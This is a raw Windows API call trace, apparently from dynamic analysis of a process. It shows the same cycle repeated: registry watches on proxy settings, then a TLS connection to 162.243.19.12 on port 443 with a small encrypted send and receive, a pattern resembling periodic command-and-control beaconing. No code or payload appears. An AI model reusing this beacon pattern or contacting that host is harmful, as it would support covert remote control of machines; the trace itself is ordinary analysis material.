	[0375.969] recv (in: s=0x7d0, buf=0x2ad23c1e970, len=5, flags=0 | out: buf=0x2ad23c1e970*) returned 5
	[0376.446] recv (in: s=0x7d0, buf=0x2ad23c1e995, len=1488, flags=0 | out: buf=0x2ad23c1e995*) returned 1488
	[0376.447] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23c1f078, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23c1f078, pfQOP=0x0) returned 0x0
	[0376.448] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0376.448] SetEvent (hEvent=0x6b8) returned 1
	[0376.502] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0390.508] CloseHandle (hObject=0x388) returned 1
	[0390.863] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0390.864] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d0) returned 0x0
	[0390.864] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0390.864] RegNotifyChangeKeyValue (hKey=0x9d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0390.865] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x25c) returned 0x0
	[0390.866] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0390.866] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0390.867] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x398) returned 0x0
	[0390.867] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0390.867] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0390.868] GetCurrentProcess () returned 0xffffffffffffffff
	[0390.868] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9cc) returned 1
	[0390.868] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb17d00
	[0390.869] WinHttpSetTimeouts (hInternet=0x2ad3bb17d00, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0390.869] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0390.892] SetEvent (hEvent=0x6b8) returned 1
	[0390.893] select (in: nfds=0, readfds=0x2ad23c267c0, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23c267c0, writefds=0x0, exceptfds=0x0) returned 1
	[0390.893] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0390.895] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0390.897] shutdown (s=0x7d0, how=2) returned 0
	[0390.899] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0390.899] closesocket (s=0x7d0) returned 0
	[0390.901] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0390.901] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d8
	[0390.901] WSAConnect (in: s=0x7d0, name=0x2ad23c27f58*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0391.024] closesocket (s=0x9d8) returned 0
	[0391.025] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23c24f00, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23c287e0, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23c287e0, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0391.027] FreeContextBuffer (in: pvContextBuffer=0x2ad3badff10 | out: pvContextBuffer=0x2ad3badff10) returned 0x0
	[0391.027] send (in: s=0x7d0, buf=0x2ad23c288b0*, len=333, flags=0 | out: buf=0x2ad23c288b0*) returned 333
	[0391.027] recv (in: s=0x7d0, buf=0x2ad23c288b0, len=5, flags=0 | out: buf=0x2ad23c288b0*) returned 5
	[0391.140] recv (in: s=0x7d0, buf=0x2ad23c288b5, len=49, flags=0 | out: buf=0x2ad23c288b5*) returned 49
	[0391.140] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23c24f00, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c28af0, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c28b10, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c28b10, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0391.141] recv (in: s=0x7d0, buf=0x2ad23c28c00, len=5, flags=0 | out: buf=0x2ad23c28c00*) returned 5
	[0391.141] recv (in: s=0x7d0, buf=0x2ad23c28c25, len=1, flags=0 | out: buf=0x2ad23c28c25*) returned 1
	[0391.141] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23c24f00, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c28cf8, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c28d18, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c28d18, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0391.141] recv (in: s=0x7d0, buf=0x2ad23c28e08, len=5, flags=0 | out: buf=0x2ad23c28e08*) returned 5
	[0391.141] recv (in: s=0x7d0, buf=0x2ad23c28e2d, len=48, flags=0 | out: buf=0x2ad23c28e2d*) returned 48
	[0391.141] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23c24f00, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c28f30, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23c28f50, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23c28f50, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0391.145] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2960 | out: pvContextBuffer=0x2ad3bad2960) returned 0x0
	[0391.145] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23c29098 | out: pBuffer=0x2ad23c29098) returned 0x0
	[0391.145] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23c290f0 | out: pBuffer=0x2ad23c290f0) returned 0x0
	[0391.146] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23c29158 | out: pBuffer=0x2ad23c29158) returned 0x0
	[0391.146] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05350) returned 0x2ad3bb05350
	[0391.147] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0391.147] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb05350
	[0391.147] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05350) returned 0x2ad3bb05350
	[0391.147] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb05350) returned 0x0
	[0391.147] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0391.148] CertFreeCertificateContext (pCertContext=0x2ad3bb05350) returned 1
	[0391.149] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0391.149] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb05350, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0391.149] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb05350, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0391.151] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0391.153] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05350) returned 0x2ad3bb05350
	[0391.154] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0391.154] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0391.155] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0391.155] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0391.155] SetLastError (dwErrCode=0x0) 
	[0391.155] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0391.156] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0391.156] CertFreeCertificateContext (pCertContext=0x2ad3bb05350) returned 1
	[0391.156] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23c2bd60, MessageSeqNo=0x0 | out: pMessage=0x2ad23c2bd60) returned 0x0
	[0391.156] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca2e0
	[0391.156] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca2e0*=((len=0x3b, buf=0x2ad23c29020*), (len=0xd5, buf=0x2ad23c2bb68*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca2e0*=((len=0x3b, buf=0x2ad23c29020*), (len=0xd5, buf=0x2ad23c2bb68*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0391.157] CoTaskMemFree (pv=0x2ad3baca2e0) 
	[0391.157] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0391.157] recv (in: s=0x7d0, buf=0x2ad23c2bf08, len=5, flags=0 | out: buf=0x2ad23c2bf08*) returned 5
	[0391.706] recv (in: s=0x7d0, buf=0x2ad23c2bf2d, len=1488, flags=0 | out: buf=0x2ad23c2bf2d*) returned 1488
	[0391.707] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23c2c610, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23c2c610, pfQOP=0x0) returned 0x0
	[0391.708] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0391.709] SetEvent (hEvent=0x6b8) returned 1
	[0391.763] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0405.766] CloseHandle (hObject=0x388) returned 1
	[0405.860] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0405.860] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d0) returned 0x0
	[0405.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0405.860] RegNotifyChangeKeyValue (hKey=0x9d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0405.861] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x25c) returned 0x0
	[0405.861] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0405.861] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0405.861] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x398) returned 0x0
	[0405.861] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0405.861] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0405.861] GetCurrentProcess () returned 0xffffffffffffffff
	[0405.861] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9cc) returned 1
	[0405.862] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb187a0
	[0405.862] WinHttpSetTimeouts (hInternet=0x2ad3bb187a0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0405.862] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0405.875] SetEvent (hEvent=0x6b8) returned 1
	[0405.876] select (in: nfds=0, readfds=0x2ad23c34008, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23c34008, writefds=0x0, exceptfds=0x0) returned 1
	[0405.876] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0405.877] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0405.877] shutdown (s=0x7d0, how=2) returned 0
	[0405.883] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0405.883] closesocket (s=0x7d0) returned 0
	[0405.884] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0405.884] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d8
	[0405.884] WSAConnect (in: s=0x7d0, name=0x2ad23c357a0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0405.990] closesocket (s=0x9d8) returned 0
	[0405.990] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23c32748, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23c36028, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23c36028, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0405.991] FreeContextBuffer (in: pvContextBuffer=0x2ad3badfda0 | out: pvContextBuffer=0x2ad3badfda0) returned 0x0
	[0405.991] send (in: s=0x7d0, buf=0x2ad23c360f8*, len=333, flags=0 | out: buf=0x2ad23c360f8*) returned 333
	[0405.992] recv (in: s=0x7d0, buf=0x2ad23c360f8, len=5, flags=0 | out: buf=0x2ad23c360f8*) returned 5
	[0406.103] recv (in: s=0x7d0, buf=0x2ad23c360fd, len=49, flags=0 | out: buf=0x2ad23c360fd*) returned 49
	[0406.103] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23c32748, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c36338, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c36358, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c36358, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0406.104] recv (in: s=0x7d0, buf=0x2ad23c36448, len=5, flags=0 | out: buf=0x2ad23c36448*) returned 5
	[0406.104] recv (in: s=0x7d0, buf=0x2ad23c3646d, len=1, flags=0 | out: buf=0x2ad23c3646d*) returned 1
	[0406.104] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23c32748, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c36540, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c36560, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c36560, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0406.104] recv (in: s=0x7d0, buf=0x2ad23c36650, len=5, flags=0 | out: buf=0x2ad23c36650*) returned 5
	[0406.104] recv (in: s=0x7d0, buf=0x2ad23c36675, len=48, flags=0 | out: buf=0x2ad23c36675*) returned 48
	[0406.104] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23c32748, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c36778, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23c36798, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23c36798, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0406.105] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad31a0 | out: pvContextBuffer=0x2ad3bad31a0) returned 0x0
	[0406.105] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23c368e0 | out: pBuffer=0x2ad23c368e0) returned 0x0
	[0406.105] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23c36938 | out: pBuffer=0x2ad23c36938) returned 0x0
	[0406.105] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23c369a0 | out: pBuffer=0x2ad23c369a0) returned 0x0
	[0406.105] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06650) returned 0x2ad3bb06650
	[0406.106] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0406.106] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb06650
	[0406.106] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06650) returned 0x2ad3bb06650
	[0406.106] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb06650) returned 0x0
	[0406.106] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0406.106] CertFreeCertificateContext (pCertContext=0x2ad3bb06650) returned 1
	[0406.106] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0406.106] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb06650, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0406.106] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb06650, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0406.107] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0406.109] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06650) returned 0x2ad3bb06650
	[0406.109] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0406.112] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0406.112] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0406.112] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0406.112] SetLastError (dwErrCode=0x0) 
	[0406.112] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0406.112] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0406.112] CertFreeCertificateContext (pCertContext=0x2ad3bb06650) returned 1
	[0406.113] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23c395a8, MessageSeqNo=0x0 | out: pMessage=0x2ad23c395a8) returned 0x0
	[0406.113] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9c20
	[0406.113] WSASend (in: s=0x7d0, lpBuffers=0x2ad3bac9c20*=((len=0x3b, buf=0x2ad23c36868*), (len=0xd5, buf=0x2ad23c393b0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3bac9c20*=((len=0x3b, buf=0x2ad23c36868*), (len=0xd5, buf=0x2ad23c393b0*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0406.113] CoTaskMemFree (pv=0x2ad3bac9c20) 
	[0406.113] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0406.113] recv (in: s=0x7d0, buf=0x2ad23c39750, len=5, flags=0 | out: buf=0x2ad23c39750*) returned 5
	[0406.597] recv (in: s=0x7d0, buf=0x2ad23c39775, len=1488, flags=0 | out: buf=0x2ad23c39775*) returned 1488
	[0406.597] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23c39e58, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23c39e58, pfQOP=0x0) returned 0x0
	[0406.598] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0406.598] SetEvent (hEvent=0x6b8) returned 1
	[0406.634] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0416.638] CloseHandle (hObject=0x388) returned 1
	[0416.933] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0416.934] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x164) returned 0x0
	[0416.934] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0416.934] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0416.935] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0xe4) returned 0x0
	[0416.935] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x25c
	[0416.935] RegNotifyChangeKeyValue (hKey=0xe4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x25c, fAsynchronous=1) returned 0x0
	[0416.936] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x270) returned 0x0
	[0416.936] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0416.936] RegNotifyChangeKeyValue (hKey=0x270, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0416.936] GetCurrentProcess () returned 0xffffffffffffffff
	[0416.936] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x3f4) returned 1
	[0416.937] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1b000
	[0416.937] WinHttpSetTimeouts (hInternet=0x2ad3bb1b000, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0416.937] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0416.968] SetEvent (hEvent=0x6b8) returned 1
	[0416.969] select (in: nfds=0, readfds=0x2ad23c41850, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23c41850, writefds=0x0, exceptfds=0x0) returned 1
	[0416.969] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0416.971] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0416.972] shutdown (s=0x7d0, how=2) returned 0
	[0416.973] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0416.973] closesocket (s=0x7d0) returned 0
	[0416.974] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0416.974] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d4
	[0416.975] WSAConnect (in: s=0x7d0, name=0x2ad23c42fe8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0417.082] closesocket (s=0x9d4) returned 0
